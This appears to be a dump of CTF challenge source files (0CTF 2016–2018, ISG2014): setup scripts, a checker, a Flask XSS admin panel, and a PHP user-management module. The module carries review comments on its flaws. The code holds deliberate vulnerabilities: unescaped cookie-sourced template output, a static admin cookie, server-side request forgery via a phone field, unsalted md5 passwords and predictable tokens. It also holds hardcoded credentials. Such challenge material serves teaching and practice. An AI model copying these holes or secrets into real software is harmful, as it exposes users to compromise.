mysql -uroot -pv8y1qjq9Xx8mDcwd < install.sql 60 | cp nginx.conf /usr/local/openresty/nginx/conf/nginx.conf 61 | cp sudoers /etc/sudoers 62 | cp -r z0ne/* /home/z0ne/ 63 | 64 | chown root:ctf /usr/local/openresty/nginx/conf/nginx.conf 65 | chmod 760 /usr/local/openresty/nginx/conf/nginx.conf 66 | 67 | chown root:z0ne /home/z0ne/uploads/ 68 | chmod 770 /home/z0ne/uploads/ 69 | chmod 750 /home/z0ne/ 70 | 71 | iptables -I INPUT -p tcp --dport 8080 -j DROP 72 | iptables -I INPUT -s 127.0.0.1 -p tcp --dport 8080 -j ACCEPT 73 | 74 | rm -rf z0ne 75 | rm -f install.sql nginx.conf readme.txt sudoers openresty-1.9.7.4.tar.gz z0ne.zip -------------------------------------------------------------------------------- /0ctf2016-final/checker/check_post.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding=utf-8 3 | import MySQLdb 4 | import requests 5 | import random 6 | import string 7 | 8 | service = 'z0ne' 9 | timeout = 10 # define timeout here 10 | author = 'md5_salt' # author 11 | 12 | sql_list = ['', 13 | '' 14 | ] 15 | 16 | 17 | def genRandomLetters(length): 18 | return ''.join([random.choice(string.letters) for i in xrange(length)]) 19 | 20 | def getTeamID(host): 21 | return int(host[8:10]) 22 | 23 | def exploit(host): 24 | port = 8000 25 | #这里host应该为mysql的host,改unix_socket 26 | conn = MySQLdb.connect(host=host,user='root',passwd='v8y1qjq9Xx8mDcwd',db='z0ne',charset="utf8")#, unix_socket='/Applications/MAMP/tmp/mysql/mysql.sock') 27 | conn.autocommit(True) 28 | cursor = conn.cursor() 29 | 30 | try: 31 | email = genRandomLetters(8)+'@example.com' 32 | password = genRandomLetters(8) 33 | if not 'User added' in requests.post('http://%s:%d/save_user'%(host, port), data={'user-email': email, 'user-new-password': password}).text: 34 | raise Exception("Reg user error") 35 | 36 | sql = "SELECT * FROM users WHERE email = %s" 37 | cursor.execute(sql, [email]) 38 | result = cursor.fetchone() 39 | 40 | secret = result[4] 41 | s = requests.Session() 42 | if not 'activate successfully' in s.post('http://%s:%d/activate'%(host, port), data={'user-email': email, 'secret': secret}).text: 43 | raise Exception("Active user error") 44 | 45 | s = requests.Session() 46 | if not 'You are logged in' in s.post('http://%s:%d/login'%(host,port), data={'login-username':email, 'login-password': password}).text: 47 | raise Exception("Login error") 48 | 49 | post_title = genRandomLetters(8) 50 | post_content = genRandomLetters(64) 51 | if 'New post created!' 
not in s.post('http://%s:%d/newpost'%(host, port), data={'post-title':post_title, 'post-full':post_content}).text: 52 | raise Exception("New post error") 53 | 54 | sql = "select pid from posts where title=%s and author=%s" 55 | cursor.execute(sql, [post_title, email]) 56 | result = cursor.fetchone() 57 | if not result: 58 | raise Exception("New post not in database") 59 | pid = result[0] 60 | 61 | if post_content not in s.get('http://%s:%d/post/%d'%(host, port, int(pid))).text: 62 | raise Exception("post content error") 63 | 64 | message = 'OK' 65 | except Exception as e: 66 | message = str(e) 67 | 68 | sql = "DELETE FROM users WHERE email = %s" 69 | cursor.execute(sql, [email]) 70 | sql = "DELETE FROM posts WHERE pid = %d"%int(pid) 71 | cursor.execute(sql) 72 | 73 | return message 74 | 75 | if __name__ == '__main__': 76 | print exploit('100.64.105.11') 77 | -------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/admin.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | #!/usr/bin/python 3 | 4 | from tornado.wsgi import WSGIContainer 5 | from tornado.httpserver import HTTPServer 6 | from tornado.ioloop import IOLoop 7 | 8 | from functools import wraps 9 | from flask import request, Flask, session, redirect, url_for, render_template_string, make_response, flash 10 | 11 | app = Flask(__name__) 12 | app.secret_key = 'A0@#$8jdfsdfs~XHH!jmasddas?RT' 13 | app.config['SERVER_NAME'] = 'admin.government.vip:8000' 14 | 15 | users = {'test':'test'} 16 | 17 | index_html = ''' 18 | 19 | 20 | Admin Panel 21 | 31 | 32 | {% autoescape false %} 33 |

Hello {{ username }}

34 | {% endautoescape %} 35 | {% if user == 'admin' %} 36 |

Upload your shell

37 |
38 |

39 |

40 |

41 | {% else %} 42 |

Only admin can upload a shell

43 | {% endif %} 44 | ''' 45 |

def logged_in(f):
    """Decorator that lets a request through only when the session has a username.

    Before that check, a request whose `admin_secret` cookie equals the fixed
    string below gets its session username set to 'admin'. When the session
    has no username, an error is flashed and the client is redirected to the
    login view.
    """
    @wraps(f)
    def decorated_function(*args, **kwargs):
        # NOTE(review): a static value compared with == works as a bearer
        # credential for the admin role: whoever holds the cookie value is
        # admin, and the promotion is written into the session. Outside a
        # challenge, roles belong in server-side state and secrets are
        # compared with hmac.compare_digest.
        if request.cookies.get('admin_secret') == 'md5_salt_is_the_real_admin':
            session['username'] = 'admin'
        if session.get('username') is not None:
            return f(*args, **kwargs)
        else:
            flash('Please log in first.', 'error')
            return redirect(url_for('login'))
    return decorated_function


@app.route('/')
@logged_in
def index():
    """Render the admin panel template.

    `username` is read from the request's `username` cookie; `user` is the
    username stored in the session.
    """
    # NOTE(review): index_html prints {{ username }} inside an
    # `{% autoescape false %}` region, and the value comes from a
    # client-controlled cookie rather than from the session, so markup in
    # that cookie reaches the page unescaped. The defensive form passes
    # session['username'] and leaves autoescaping on.
    return render_template_string(index_html, username=request.cookies.get('username'), user=session['username'])

63 | @app.route('/login', methods=['GET', 'POST']) 64 | def login(): 65 | if request.method == 'POST': 66 | if users.get(request.form['username']) == request.form['password']: 67 | session['username'] = request.form['username'] 68 | resp = make_response(redirect(url_for('index'))) 69 | resp.set_cookie('username', request.form['username']) 70 | return resp 71 | return ''' 72 |
73 |

Username 74 |

Password 75 |

76 |

77 | ''' 78 | 79 | @app.route('/upload', methods=['POST']) 80 | @logged_in 81 | def upload_file(): 82 | if request.method == 'POST' and session['username'] == 'admin': 83 | file = request.files['file'] 84 | if file: 85 | return 'flag{xss_is_fun_2333333}' 86 | return 'hey dude, upload your shell' 87 | 88 | 89 | if __name__ == '__main__': 90 | http_server = HTTPServer(WSGIContainer(app)) 91 | http_server.listen(8000) #flask默认的端口,可任意修改 92 | IOLoop.instance().start() 93 | #app.run(debug=True,port=8000) -------------------------------------------------------------------------------- /0ctf2017-qual/simplesqlin_100/nginx.conf: -------------------------------------------------------------------------------- 1 | 2 | user www-data; 3 | worker_processes 1; 4 | 5 | #error_log logs/error.log; 6 | #error_log logs/error.log notice; 7 | #error_log logs/error.log info; 8 | 9 | #pid logs/nginx.pid; 10 | 11 | 12 | events { 13 | worker_connections 1024; 14 | } 15 | 16 | 17 | http { 18 | include mime.types; 19 | default_type application/octet-stream; 20 | 21 | #log_format main '$remote_addr - $remote_user [$time_local] "$request" ' 22 | # '$status $body_bytes_sent "$http_referer" ' 23 | # '"$http_user_agent" "$http_x_forwarded_for"'; 24 | 25 | #access_log logs/access.log main; 26 | 27 | sendfile on; 28 | #tcp_nopush on; 29 | 30 | #keepalive_timeout 0; 31 | keepalive_timeout 65; 32 | 33 | #gzip on; 34 | lua_package_path "/usr/local/openresty/nginx/conf/waf/?.lua"; 35 | lua_shared_dict limit 10m; 36 | init_by_lua_file /usr/local/openresty/nginx/conf/waf/init.lua; 37 | access_by_lua_file /usr/local/openresty/nginx/conf/waf/waf.lua; 38 | 39 | server { 40 | listen 80; 41 | server_name localhost; 42 | 43 | #charset koi8-r; 44 | 45 | #access_log logs/host.access.log main; 46 | 47 | location / { 48 | root /usr/local/openresty/nginx/html; 49 | index index.php index.html index.htm; 50 | } 51 | 52 | #error_page 404 /404.html; 53 | 54 | # redirect server error pages to the static page /50x.html 55 
| # 56 | error_page 500 502 503 504 /50x.html; 57 | location = /50x.html { 58 | root html; 59 | } 60 | 61 | # proxy the PHP scripts to Apache listening on 127.0.0.1:80 62 | # 63 | #location ~ \.php$ { 64 | # proxy_pass http://127.0.0.1; 65 | #} 66 | 67 | # pass the PHP scripts to FastCGI server listening on 127.0.0.1:9000 68 | # 69 | location ~ \.php$ { 70 | root /usr/local/openresty/nginx/html; 71 | fastcgi_pass unix:/run/php/php7.0-fpm.sock; 72 | fastcgi_index index.php; 73 | fastcgi_param SCRIPT_FILENAME /usr/local/openresty/nginx/html$fastcgi_script_name; 74 | include fastcgi_params; 75 | } 76 | 77 | # deny access to .htaccess files, if Apache's document root 78 | # concurs with nginx's one 79 | # 80 | #location ~ /\.ht { 81 | # deny all; 82 | #} 83 | } 84 | 85 | 86 | # another virtual host using mix of IP-, name-, and port-based configuration 87 | # 88 | #server { 89 | # listen 8000; 90 | # listen somename:8080; 91 | # server_name somename alias another.alias; 92 | 93 | # location / { 94 | # root html; 95 | # index index.html index.htm; 96 | # } 97 | #} 98 | 99 | 100 | # HTTPS server 101 | # 102 | #server { 103 | # listen 443 ssl; 104 | # server_name localhost; 105 | 106 | # ssl_certificate cert.pem; 107 | # ssl_certificate_key cert.key; 108 | 109 | # ssl_session_cache shared:SSL:1m; 110 | # ssl_session_timeout 5m; 111 | 112 | # ssl_ciphers HIGH:!aNULL:!MD5; 113 | # ssl_prefer_server_ciphers on; 114 | 115 | # location / { 116 | # root html; 117 | # index index.html index.htm; 118 | # } 119 | #} 120 | 121 | } 122 | -------------------------------------------------------------------------------- /0ctf2017-qual/simplexss/index.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | 15 | 16 | 17 | 18 | 19 | Simple XSS 20 | 21 | 22 | 23 | 24 | 25 | 26 |
27 |
28 |

Simple XSS

29 |

Flag is in flag.php with ip restriction

30 |

No bruteforcing and scanning!

31 |

Try to bypass filter and exploit

32 |

Capcha is not needed for preview.

33 |

Always use latest Chrome

34 |
35 |

Try to find a string $str so that (substr(md5($str), 0, 6) === '').

36 |
37 |
38 | 39 | 41 | 42 | 44 |
45 |
46 |

Loading capcha......

47 |

Drag to the right place

48 |
49 | 50 | 51 |
52 |
53 | 91 | 92 | -------------------------------------------------------------------------------- /0ctf2018-qual/easy_ums/common.php: -------------------------------------------------------------------------------- 1 | prepare("SELECT * FROM users WHERE username=?"); 15 | $stmt->bind_param("s", $username); 16 | $stmt->execute(); 17 | $result = $stmt->get_result(); 18 | if($result->num_rows === 0) return false; 19 | else return true; 20 | } 21 |

/**
 * Report whether $phone passes filter_phone() and already belongs to a user.
 *
 * Returns false both when filter_phone() rejects the value and when no row
 * has that phone, so callers cannot tell the two cases apart.
 */
function check_phone($phone){
    global $mysqli;
    if(!filter_phone($phone)) return false;
    $stmt = $mysqli->prepare("SELECT * FROM users WHERE phone=?");
    $stmt->bind_param("s", $phone);
    $stmt->execute();
    $result = $stmt->get_result();
    if($result->num_rows === 0) return false;
    else return true;
}

/**
 * Create a user and return the new row id, or false when the username is
 * longer than 16 bytes, the username exists, or check_phone() returns true.
 */
function register($username, $password, $phone){
    global $mysqli;
    if(strlen($username) > 16) return false;
    if(check_user($username)) return false;
    // NOTE(review): check_phone() also returns false for a value that
    // filter_phone() rejects, so such a value is not refused here. If
    // filter_phone() is meant to validate the format, call it directly.
    if(check_phone($phone)) return false;
    // NOTE(review): unsalted md5 is a fast hash and unsuitable for password
    // storage; password_hash()/password_verify() is the defensive choice.
    $password = md5($password);
    $stmt = $mysqli->prepare("INSERT INTO users(username, password, phone) VALUES(?, ?, ?)");
    $stmt->bind_param("sss", $username, $password, $phone);
    $stmt->execute();
    return $stmt->insert_id;
}

/**
 * Check the credentials and, on success, copy id, username, phone and verify
 * from the user row into the session. Returns true on success, else false.
 */
function login($username, $password){
    global $mysqli;
    $password = md5($password);
    $stmt = $mysqli->prepare("SELECT * FROM users WHERE username=? and password=?");
    $stmt->bind_param("ss", $username, $password);
    $stmt->execute();
    $result = $stmt->get_result();
    if($result->num_rows === 0) return false;
    $row = $result->fetch_assoc();
    // Session values are a snapshot of the row at login time; later updates
    // to the row are not reflected unless the session is written again.
    $_SESSION['id'] = $row['id'];
    $_SESSION['username'] = $row['username'];
    $_SESSION['phone'] = $row['phone'];
    $_SESSION['verify'] = $row['verify'];
    return true;
}

/**
 * Record the attempt with change_log(), then issue a body-less HTTP request
 * to http://<phone>/?<msg> and return curl_exec()'s result.
 */
function send_sms($phone, $msg){
    change_log($phone);
    // NOTE(review): $phone is used as the URL host and $msg is appended
    // unencoded, and this function does no validation of its own. Whatever
    // reaches it decides where the server connects (server-side request
    // forgery class). A defensive version sends only to a fixed gateway or
    // an allow-list and encodes the message.
    $url = 'http://'.$phone.'/?'.$msg;
    $ch = curl_init((string)$url);
    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 3);
    //curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'HEAD');
    curl_setopt($ch, CURLOPT_TIMEOUT, 3);
    curl_setopt($ch, CURLOPT_NOBODY, 1);
    return curl_exec($ch);
}

/** Set verify=1 on the row of the logged-in user. */
function set_verify(){
    global $mysqli;
    // NOTE(review): the id is concatenated into the SQL text while the other
    // queries in this file bind their parameters. The value is the one
    // login() copied from the database, but a bound parameter would keep
    // the file consistent.
    $mysqli->query("UPDATE users SET verify=1 WHERE id=".$_SESSION['id']);
}

/** Set verify=0 on the row of the logged-in user. */
function unset_verify(){
    global $mysqli;
    $mysqli->query("UPDATE users SET verify=0 WHERE id=".$_SESSION['id']);
}

/** Redirect to verify.php and stop unless the session's verify value is the integer 1. */
function check_verify(){
    // NOTE(review): the strict comparison only passes for an integer; this
    // assumes the driver returns the column as an int. TODO confirm.
    if($_SESSION['verify'] !== 1){
        header("Location: verify.php");
        die();
    }
}

/**
 * Change the phone of the logged-in user; refused (false) for user id 1.
 *
 * The function itself neither validates $phone nor touches the verify column
 * or $_SESSION['phone']; whether callers do so is not visible here.
 */
function update_phone($phone){
    if($_SESSION['id'] === 1) return false;
    global $mysqli;
    $stmt = $mysqli->prepare("UPDATE users SET phone=? WHERE id=?");
    $stmt->bind_param("si", $phone, $_SESSION['id']);
    $stmt->execute();
    return true;
}

/** Return true when the session has a truthy id; otherwise redirect to login.php and stop. */
function check_login(){
    if($_SESSION['id']) return true;
    else{
        header("Location: login.php");
        die();
    };
}

/** Build a verification code: md5 over two mt_rand() values, $flag and $phone. */
function generate_code($phone){
    global $flag;
    // NOTE(review): mt_rand() is not a cryptographically secure generator;
    // random_bytes()/random_int() are the defensive choice for tokens.
    return md5(mt_rand().$flag.mt_rand().$phone);
}

/** Replace the logged-in user's token with ($phone, $code). */
function insert_code($phone, $code){
    global $mysqli;
    // The delete and the insert are two separate statements, not one
    // transaction. NOTE(review): concurrent requests for the same uid could
    // interleave here; confirm whether tokens.uid carries a unique constraint.
    delete_code(); // !!!!
    $stmt = $mysqli->prepare("INSERT INTO tokens(uid, phone, token) VALUES(?, ?, ?)");
    $stmt->bind_param("iss",$_SESSION['id'], $phone, $code);
    $stmt->execute();
}

/** Delete every token row of the logged-in user. */
function delete_code(){
    global $mysqli;
    $stmt = $mysqli->prepare("DELETE FROM tokens WHERE uid=?");
    $stmt->bind_param("i", $_SESSION['id']);
    $stmt->execute();
}

/**
 * Report whether a token row matches $phone, $code and the logged-in user.
 * The row is not removed here; whether callers delete it is not visible.
 */
function check_code($phone, $code){
    global $mysqli;
    $stmt = $mysqli->prepare("SELECT * FROM tokens WHERE phone=? and token=? and uid=?");
    $stmt->bind_param("ssi", $phone, $code, $_SESSION['id']);
    $stmt->execute();
    $result = $stmt->get_result();
    if($result->num_rows === 0) return false;
    else return true;
}

/** Append (uid, phone, client address) to change_log. */
function change_log($phone){
    global $mysqli;
    $stmt = $mysqli->prepare("INSERT INTO change_log(uid, phone, ip) VALUES(?, ?, ?)");
    $stmt->bind_param("iss",$_SESSION['id'], $phone, $_SERVER['REMOTE_ADDR']);
    $stmt->execute();
}

/**
 * Return true when the logged-in user's row has phone '8.8.8.8' and verify 1.
 * Returns false when the row is missing and nothing (null) otherwise.
 */
function get_flag(){
    global $mysqli;
    $stmt = $mysqli->prepare("SELECT * FROM users WHERE id=?");
    $stmt->bind_param("i", $_SESSION['id']);
    $stmt->execute();
    $result = $stmt->get_result();
    if($result->num_rows === 0) return false;
    $row = $result->fetch_assoc();
    if($row['phone'] === '8.8.8.8' && $row['verify'] === 1){
        return true;
    }
}
-------------------------------------------------------------------------------- /ISG2014/safesite/main/static/bootstrap-theme.min.css: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap v3.2.0 (http://getbootstrap.com) 3 | * Copyright 2011-2014 Twitter, Inc.
4 | * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) 5 | */.btn-default,.btn-primary,.btn-success,.btn-info,.btn-warning,.btn-danger{text-shadow:0 -1px 0 rgba(0,0,0,.2);-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,.15),0 1px 1px rgba(0,0,0,.075);box-shadow:inset 0 1px 0 rgba(255,255,255,.15),0 1px 1px rgba(0,0,0,.075)}.btn-default:active,.btn-primary:active,.btn-success:active,.btn-info:active,.btn-warning:active,.btn-danger:active,.btn-default.active,.btn-primary.active,.btn-success.active,.btn-info.active,.btn-warning.active,.btn-danger.active{-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.btn:active,.btn.active{background-image:none}.btn-default{text-shadow:0 1px 0 #fff;background-image:-webkit-linear-gradient(top,#fff 0,#e0e0e0 100%);background-image:-o-linear-gradient(top,#fff 0,#e0e0e0 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#fff),to(#e0e0e0));background-image:linear-gradient(to bottom,#fff 0,#e0e0e0 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff', endColorstr='#ffe0e0e0', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-color:#dbdbdb;border-color:#ccc}.btn-default:hover,.btn-default:focus{background-color:#e0e0e0;background-position:0 -15px}.btn-default:active,.btn-default.active{background-color:#e0e0e0;border-color:#dbdbdb}.btn-default:disabled,.btn-default[disabled]{background-color:#e0e0e0;background-image:none}.btn-primary{background-image:-webkit-linear-gradient(top,#428bca 0,#2d6ca2 100%);background-image:-o-linear-gradient(top,#428bca 0,#2d6ca2 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#428bca),to(#2d6ca2));background-image:linear-gradient(to bottom,#428bca 0,#2d6ca2 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff428bca', endColorstr='#ff2d6ca2', 
GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-color:#2b669a}.btn-primary:hover,.btn-primary:focus{background-color:#2d6ca2;background-position:0 -15px}.btn-primary:active,.btn-primary.active{background-color:#2d6ca2;border-color:#2b669a}.btn-primary:disabled,.btn-primary[disabled]{background-color:#2d6ca2;background-image:none}.btn-success{background-image:-webkit-linear-gradient(top,#5cb85c 0,#419641 100%);background-image:-o-linear-gradient(top,#5cb85c 0,#419641 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#5cb85c),to(#419641));background-image:linear-gradient(to bottom,#5cb85c 0,#419641 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5cb85c', endColorstr='#ff419641', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-color:#3e8f3e}.btn-success:hover,.btn-success:focus{background-color:#419641;background-position:0 -15px}.btn-success:active,.btn-success.active{background-color:#419641;border-color:#3e8f3e}.btn-success:disabled,.btn-success[disabled]{background-color:#419641;background-image:none}.btn-info{background-image:-webkit-linear-gradient(top,#5bc0de 0,#2aabd2 100%);background-image:-o-linear-gradient(top,#5bc0de 0,#2aabd2 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#5bc0de),to(#2aabd2));background-image:linear-gradient(to bottom,#5bc0de 0,#2aabd2 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5bc0de', endColorstr='#ff2aabd2', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-color:#28a4c9}.btn-info:hover,.btn-info:focus{background-color:#2aabd2;background-position:0 
-15px}.btn-info:active,.btn-info.active{background-color:#2aabd2;border-color:#28a4c9}.btn-info:disabled,.btn-info[disabled]{background-color:#2aabd2;background-image:none}.btn-warning{background-image:-webkit-linear-gradient(top,#f0ad4e 0,#eb9316 100%);background-image:-o-linear-gradient(top,#f0ad4e 0,#eb9316 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#f0ad4e),to(#eb9316));background-image:linear-gradient(to bottom,#f0ad4e 0,#eb9316 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff0ad4e', endColorstr='#ffeb9316', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-color:#e38d13}.btn-warning:hover,.btn-warning:focus{background-color:#eb9316;background-position:0 -15px}.btn-warning:active,.btn-warning.active{background-color:#eb9316;border-color:#e38d13}.btn-warning:disabled,.btn-warning[disabled]{background-color:#eb9316;background-image:none}.btn-danger{background-image:-webkit-linear-gradient(top,#d9534f 0,#c12e2a 100%);background-image:-o-linear-gradient(top,#d9534f 0,#c12e2a 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#d9534f),to(#c12e2a));background-image:linear-gradient(to bottom,#d9534f 0,#c12e2a 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffd9534f', endColorstr='#ffc12e2a', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-color:#b92c28}.btn-danger:hover,.btn-danger:focus{background-color:#c12e2a;background-position:0 -15px}.btn-danger:active,.btn-danger.active{background-color:#c12e2a;border-color:#b92c28}.btn-danger:disabled,.btn-danger[disabled]{background-color:#c12e2a;background-image:none}.thumbnail,.img-thumbnail{-webkit-box-shadow:0 1px 2px rgba(0,0,0,.075);box-shadow:0 1px 2px 
rgba(0,0,0,.075)}.dropdown-menu>li>a:hover,.dropdown-menu>li>a:focus{background-color:#e8e8e8;background-image:-webkit-linear-gradient(top,#f5f5f5 0,#e8e8e8 100%);background-image:-o-linear-gradient(top,#f5f5f5 0,#e8e8e8 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#f5f5f5),to(#e8e8e8));background-image:linear-gradient(to bottom,#f5f5f5 0,#e8e8e8 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff5f5f5', endColorstr='#ffe8e8e8', GradientType=0);background-repeat:repeat-x}.dropdown-menu>.active>a,.dropdown-menu>.active>a:hover,.dropdown-menu>.active>a:focus{background-color:#357ebd;background-image:-webkit-linear-gradient(top,#428bca 0,#357ebd 100%);background-image:-o-linear-gradient(top,#428bca 0,#357ebd 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#428bca),to(#357ebd));background-image:linear-gradient(to bottom,#428bca 0,#357ebd 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff428bca', endColorstr='#ff357ebd', GradientType=0);background-repeat:repeat-x}.navbar-default{background-image:-webkit-linear-gradient(top,#fff 0,#f8f8f8 100%);background-image:-o-linear-gradient(top,#fff 0,#f8f8f8 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#fff),to(#f8f8f8));background-image:linear-gradient(to bottom,#fff 0,#f8f8f8 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff', endColorstr='#fff8f8f8', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x;border-radius:4px;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,.15),0 1px 5px rgba(0,0,0,.075);box-shadow:inset 0 1px 0 rgba(255,255,255,.15),0 1px 5px rgba(0,0,0,.075)}.navbar-default .navbar-nav>.active>a{background-image:-webkit-linear-gradient(top,#ebebeb 0,#f3f3f3 100%);background-image:-o-linear-gradient(top,#ebebeb 0,#f3f3f3 100%);background-image:-webkit-gradient(linear,left top,left 
bottom,from(#ebebeb),to(#f3f3f3));background-image:linear-gradient(to bottom,#ebebeb 0,#f3f3f3 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffebebeb', endColorstr='#fff3f3f3', GradientType=0);background-repeat:repeat-x;-webkit-box-shadow:inset 0 3px 9px rgba(0,0,0,.075);box-shadow:inset 0 3px 9px rgba(0,0,0,.075)}.navbar-brand,.navbar-nav>li>a{text-shadow:0 1px 0 rgba(255,255,255,.25)}.navbar-inverse{background-image:-webkit-linear-gradient(top,#3c3c3c 0,#222 100%);background-image:-o-linear-gradient(top,#3c3c3c 0,#222 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#3c3c3c),to(#222));background-image:linear-gradient(to bottom,#3c3c3c 0,#222 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff3c3c3c', endColorstr='#ff222222', GradientType=0);filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);background-repeat:repeat-x}.navbar-inverse .navbar-nav>.active>a{background-image:-webkit-linear-gradient(top,#222 0,#282828 100%);background-image:-o-linear-gradient(top,#222 0,#282828 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#222),to(#282828));background-image:linear-gradient(to bottom,#222 0,#282828 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff222222', endColorstr='#ff282828', GradientType=0);background-repeat:repeat-x;-webkit-box-shadow:inset 0 3px 9px rgba(0,0,0,.25);box-shadow:inset 0 3px 9px rgba(0,0,0,.25)}.navbar-inverse .navbar-brand,.navbar-inverse .navbar-nav>li>a{text-shadow:0 -1px 0 rgba(0,0,0,.25)}.navbar-static-top,.navbar-fixed-top,.navbar-fixed-bottom{border-radius:0}.alert{text-shadow:0 1px 0 rgba(255,255,255,.2);-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,.25),0 1px 2px rgba(0,0,0,.05);box-shadow:inset 0 1px 0 rgba(255,255,255,.25),0 1px 2px rgba(0,0,0,.05)}.alert-success{background-image:-webkit-linear-gradient(top,#dff0d8 0,#c8e5bc 100%);background-image:-o-linear-gradient(top,#dff0d8 0,#c8e5bc 
100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#dff0d8),to(#c8e5bc));background-image:linear-gradient(to bottom,#dff0d8 0,#c8e5bc 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffdff0d8', endColorstr='#ffc8e5bc', GradientType=0);background-repeat:repeat-x;border-color:#b2dba1}.alert-info{background-image:-webkit-linear-gradient(top,#d9edf7 0,#b9def0 100%);background-image:-o-linear-gradient(top,#d9edf7 0,#b9def0 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#d9edf7),to(#b9def0));background-image:linear-gradient(to bottom,#d9edf7 0,#b9def0 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffd9edf7', endColorstr='#ffb9def0', GradientType=0);background-repeat:repeat-x;border-color:#9acfea}.alert-warning{background-image:-webkit-linear-gradient(top,#fcf8e3 0,#f8efc0 100%);background-image:-o-linear-gradient(top,#fcf8e3 0,#f8efc0 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#fcf8e3),to(#f8efc0));background-image:linear-gradient(to bottom,#fcf8e3 0,#f8efc0 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fffcf8e3', endColorstr='#fff8efc0', GradientType=0);background-repeat:repeat-x;border-color:#f5e79e}.alert-danger{background-image:-webkit-linear-gradient(top,#f2dede 0,#e7c3c3 100%);background-image:-o-linear-gradient(top,#f2dede 0,#e7c3c3 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#f2dede),to(#e7c3c3));background-image:linear-gradient(to bottom,#f2dede 0,#e7c3c3 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fff2dede', endColorstr='#ffe7c3c3', GradientType=0);background-repeat:repeat-x;border-color:#dca7a7}.progress{background-image:-webkit-linear-gradient(top,#ebebeb 0,#f5f5f5 100%);background-image:-o-linear-gradient(top,#ebebeb 0,#f5f5f5 100%);background-image:-webkit-gradient(linear,left top,left 
bottom,from(#ebebeb),to(#f5f5f5));background-image:linear-gradient(to bottom,#ebebeb 0,#f5f5f5 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffebebeb', endColorstr='#fff5f5f5', GradientType=0);background-repeat:repeat-x}.progress-bar{background-image:-webkit-linear-gradient(top,#428bca 0,#3071a9 100%);background-image:-o-linear-gradient(top,#428bca 0,#3071a9 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#428bca),to(#3071a9));background-image:linear-gradient(to bottom,#428bca 0,#3071a9 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff428bca', endColorstr='#ff3071a9', GradientType=0);background-repeat:repeat-x}.progress-bar-success{background-image:-webkit-linear-gradient(top,#5cb85c 0,#449d44 100%);background-image:-o-linear-gradient(top,#5cb85c 0,#449d44 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#5cb85c),to(#449d44));background-image:linear-gradient(to bottom,#5cb85c 0,#449d44 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5cb85c', endColorstr='#ff449d44', GradientType=0);background-repeat:repeat-x}.progress-bar-info{background-image:-webkit-linear-gradient(top,#5bc0de 0,#31b0d5 100%);background-image:-o-linear-gradient(top,#5bc0de 0,#31b0d5 100%);background-image:-webkit-gradient(linear,left top,left bottom,from(#5bc0de),to(#31b0d5));background-image:linear-gradient(to bottom,#5bc0de 0,#31b0d5 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5bc0de', endColorstr='#ff31b0d5', GradientType=0);background-repeat:repeat-x}.progress-bar-warning{background-image:-webkit-linear-gradient(top,#f0ad4e 0,#ec971f 100%);background-image:-o-linear-gradient(top,#f0ad4e 0,#ec971f 